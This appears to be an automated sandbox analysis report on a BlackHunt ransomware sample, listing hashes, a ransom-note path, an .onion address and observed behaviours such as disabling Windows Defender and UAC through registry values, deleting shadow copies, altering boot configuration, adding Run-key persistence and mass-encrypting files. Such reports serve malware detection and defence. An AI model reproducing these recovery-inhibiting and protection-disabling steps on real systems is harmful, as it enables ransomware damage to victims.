Analysis
-
max time kernel
133s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 01:08
Static task
static1
Behavioral task
behavioral1
Sample
de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
Resource
win10v2004-20231215-en
General
-
Target
de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
-
Size
707KB
-
MD5
31b37b83804d77f81c043d287a022572
-
SHA1
3211a7e65f36760f1dd465bbb2452db1edea4f2e
-
SHA256
de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25
-
SHA512
8832e70da76994483a124d9fdbab39d16279f4502f7878eee64c72452435da8428827a9a6097d40ac60269a942c8db25c31d450943c3cbd2c5dbd7dff60f6e21
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza158Svnh:6uaTmkZJ+naie5OTamgEoKxLWc8h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 848 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2516 bcdedit.exe 544 bcdedit.exe -
Renames multiple (2922) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2920 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\V: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\W: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\R: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\N: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\M: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\E: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\P: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\U: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\B: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\S: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\G: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\H: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\Z: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\X: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\I: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\Y: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\O: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\A: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\L: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\K: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\T: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\#BlackHunt_ReadMe.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\#BlackHunt_Private.key de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\HST de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\VideoLAN\VLC\plugins\access_output\#BlackHunt_Private.key de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files (x86)\Google\Update\1.3.36.151\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_ButtonGraphic.png de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\default.jfc de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\VideoLAN\VLC\locale\da\#BlackHunt_Private.key de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files (x86)\Adobe\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-highlight.png de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach_5.5.0.165303.jar de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-visual.jar de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-applemenu.xml de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Aqtau de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\#BlackHunt_Private.key de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.jar de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-windows.jar de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Petersburg de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Miquelon de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_INTRO_BG_PAL.wmv de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkDrop32x32.gif de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director_2.3.100.v20140224-1921.jar de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\#BlackHunt_Private.key de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Algiers de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\DVD Maker\en-US\#BlackHunt_ReadMe.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Danmarkshavn de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Reunion de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\visualvm.clusters de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\VideoLAN\VLC\locale\az\#BlackHunt_Private.key de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Regina de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_de.properties de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\#BlackHunt_Private.key de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ext_5.5.0.165303.jar de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_zh_CN.jar de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Majuro de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\acro20.lng de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ho_Chi_Minh de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-awt.xml de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cambridge_Bay de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File created C:\Program Files\Java\jdk1.7.0_80\#BlackHunt_ReadMe.hta de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Los_Angeles de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_streams.luac de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\icecast.luac de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\scrapbook.png de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Uzhgorod de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_CopyNoDrop32x32.gif de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Vladivostok de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+10 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1356 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2836 vssadmin.exe 2844 vssadmin.exe 568 vssadmin.exe 2488 vssadmin.exe 2492 vssadmin.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe Token: SeRestorePrivilege 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe Token: SeBackupPrivilege 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe Token: SeTakeOwnershipPrivilege 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe Token: SeAuditPrivilege 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe Token: SeSecurityPrivilege 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe Token: SeIncBasePriorityPrivilege 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe Token: SeBackupPrivilege 560 vssvc.exe Token: SeRestorePrivilege 560 vssvc.exe Token: SeAuditPrivilege 560 vssvc.exe Token: SeBackupPrivilege 1808 wbengine.exe Token: SeRestorePrivilege 1808 wbengine.exe Token: SeSecurityPrivilege 1808 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2472 wrote to memory of 2424 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 29 PID 2472 wrote to memory of 2424 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 29 PID 2472 wrote to memory of 2424 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 29 PID 2472 wrote to memory of 2424 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 29 PID 2472 wrote to memory of 2260 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 31 PID 2472 wrote to memory of 2260 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 31 PID 2472 wrote to memory of 2260 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 31 PID 2472 wrote to memory of 2260 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 31 PID 2472 wrote to memory of 2688 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 32 PID 2472 wrote to memory of 2688 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 32 PID 2472 wrote to memory of 2688 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 32 PID 2472 wrote to memory of 2688 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 32 PID 2472 wrote to memory of 2652 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 33 PID 2472 wrote to memory of 2652 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 33 PID 2472 wrote to memory of 2652 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 33 PID 2472 wrote to memory of 2652 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 33 PID 2472 wrote to memory of 2760 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 35 PID 2472 wrote to memory of 2760 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 35 PID 2472 wrote to memory of 2760 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 35 PID 2472 wrote to memory of 2760 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 35 PID 2472 wrote to memory of 2788 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 37 PID 2472 wrote to memory of 2788 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 37 PID 2472 wrote to memory of 2788 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 37 PID 2472 wrote to memory of 2788 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 37 PID 2472 wrote to memory of 2752 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 38 PID 2472 wrote to memory of 2752 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 38 PID 2472 wrote to memory of 2752 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 38 PID 2472 wrote to memory of 2752 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 38 PID 2472 wrote to memory of 2672 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 40 PID 2472 wrote to memory of 2672 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 40 PID 2472 wrote to memory of 2672 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 40 PID 2472 wrote to memory of 2672 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 40 PID 2472 wrote to memory of 2800 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 42 PID 2472 wrote to memory of 2800 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 42 PID 2472 wrote to memory of 2800 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 42 PID 2472 wrote to memory of 2800 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 42 PID 2472 wrote to memory of 2832 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 44 PID 2472 wrote to memory of 2832 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 44 PID 2472 wrote to memory of 2832 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 44 PID 2472 wrote to memory of 2832 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 44 PID 2472 wrote to memory of 2796 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 46 PID 2472 wrote to memory of 2796 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 46 PID 2472 wrote to memory of 2796 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 46 PID 2472 wrote to memory of 2796 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 46 PID 2472 wrote to memory of 2584 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 48 PID 2472 wrote to memory of 2584 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 48 PID 2472 wrote to memory of 2584 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 48 PID 2472 wrote to memory of 2584 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 48 PID 2472 wrote to memory of 2572 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 50 PID 2472 wrote to memory of 2572 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 50 PID 2472 wrote to memory of 2572 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 50 PID 2472 wrote to memory of 2572 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 50 PID 2424 wrote to memory of 2820 2424 cmd.exe 47 PID 2424 wrote to memory of 2820 2424 cmd.exe 47 PID 2424 wrote to memory of 2820 2424 cmd.exe 47 PID 2472 wrote to memory of 1028 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 52 PID 2472 wrote to memory of 1028 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 52 PID 2472 wrote to memory of 1028 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 52 PID 2472 wrote to memory of 1028 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 52 PID 2472 wrote to memory of 2716 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 54 PID 2472 wrote to memory of 2716 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 54 PID 2472 wrote to memory of 2716 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 54 PID 2472 wrote to memory of 2716 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 54 PID 2472 wrote to memory of 2660 2472 de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe 55 -
System policy modification 1 TTPs 3 IoCs
